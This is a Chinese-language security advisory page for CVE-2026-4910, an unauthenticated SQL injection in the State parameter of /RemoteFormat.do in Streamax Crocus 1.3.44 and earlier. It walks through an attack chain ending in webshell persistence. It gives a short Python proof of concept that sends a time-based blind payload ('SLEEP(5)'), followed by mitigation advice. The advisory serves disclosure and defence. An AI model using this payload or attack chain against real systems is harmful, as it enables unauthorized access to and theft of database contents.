IPBUF安全漏洞报告
English
CVE-2026-4910 CVSS 7.3 高危

CVE-2026-4910 Streamax Crocus SQL注入漏洞

披露日期: 2026-03-27

漏洞信息

漏洞编号
CVE-2026-4910
漏洞类型
SQL注入
CVSS评分
7.3 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
深圳锐明技术 Streamax Crocus

相关标签

SQL注入StreamaxCrocus远程漏洞高危漏洞锐明技术

漏洞概述

深圳锐明技术有限公司的Streamax Crocus系统在1.3.44及以下版本中存在一个高危安全漏洞。该漏洞源于组件Endpoint中的/RemoteFormat.do文件对其State参数处理不当,导致攻击者可以实施SQL注入攻击。由于无需用户认证且攻击复杂度低,攻击者可远程利用此漏洞窃取数据库信息或篡改数据。目前厂商尚未对此披露做出响应,且相关利用代码已公开,风险较高。

技术细节

该漏洞属于典型的SQL注入漏洞。在Streamax Crocus系统的Web接口中,/RemoteFormat.do端点负责处理远程格式化请求。由于服务器端未对用户提交的“State”参数进行严格的类型检查或过滤,直接将其拼接到SQL查询语句中执行。攻击者可以通过构造恶意的SQL语句作为State参数的值发送至服务器。例如,使用UNION SELECT语句或其他布尔盲注技巧,攻击者可以绕过简单的逻辑判断,从后端数据库中提取敏感信息(如用户凭证、系统配置),或者在特定条件下执行写入操作。由于CVSS向量显示无需认证(PR:N)且可远程利用(AV:N),任何能够访问目标Web接口的攻击者均可轻易发起攻击。

攻击链分析

STEP 1
侦查
攻击者使用扫描工具或手工探测发现目标系统为Streamax Crocus,且版本低于或等于1.3.44,并确认/RemoteFormat.do接口可访问。
STEP 2
漏洞探测
攻击者向/RemoteFormat.do端点发送特制的HTTP POST请求,在State参数中注入SQL测试语句(如单引号或AND 1=1),观察服务器响应以判断是否存在注入点。
STEP 3
漏洞利用
确认漏洞存在后,攻击者构造更复杂的SQL注入Payload(如UNION SELECT或布尔盲注),通过State参数发送,以读取数据库表结构、提取敏感数据(如管理员密码)或执行系统命令。
STEP 4
维持权限与后门
利用获取的数据库凭据或系统权限,攻击者可能尝试创建系统账号或写入Webshell,以长期控制受害服务器。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# PoC for CVE-2026-4910 # Target: Streamax Crocus <= 1.3.44 # Endpoint: /RemoteFormat.do # Vulnerable Parameter: State import requests def check_sql_injection(target_url): # Construct the malicious payload for time-based blind SQL injection # The payload attempts to cause a delay of 5 seconds if the injection is successful payload = "1' AND SLEEP(5)-- -" # Data to be sent in the POST request data = { "State": payload } try: print(f"[+] Sending request to {target_url}/RemoteFormat.do...") response = requests.post(f"{target_url}/RemoteFormat.do", data=data, timeout=10) # Check if the response time indicates successful injection (approximate) if response.elapsed.total_seconds() >= 5: print("[+] Vulnerability confirmed! The application responded with a delay.") print(f"[+] Response Status: {response.status_code}") else: print("[-] Vulnerability not detected or payload failed.") except requests.exceptions.RequestException as e: print(f"[!] Error occurred: {e}") if __name__ == "__main__": # Replace with the actual target IP or domain target = "http://192.168.1.100" check_sql_injection(target)

影响范围

深圳锐明技术 Streamax Crocus <= 1.3.44

防御指南

临时缓解措施
由于厂商目前尚未回应,建议立即限制对/RemoteFormat.do接口的外网访问,仅允许受信任的内网IP访问。同时,应在前端代理服务器(如Nginx)或WAF层拦截包含SQL注入特征字符(如单引号、UNION、SELECT、SLEEP等)的请求参数,以阻断攻击尝试,直至官方修复方案发布。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表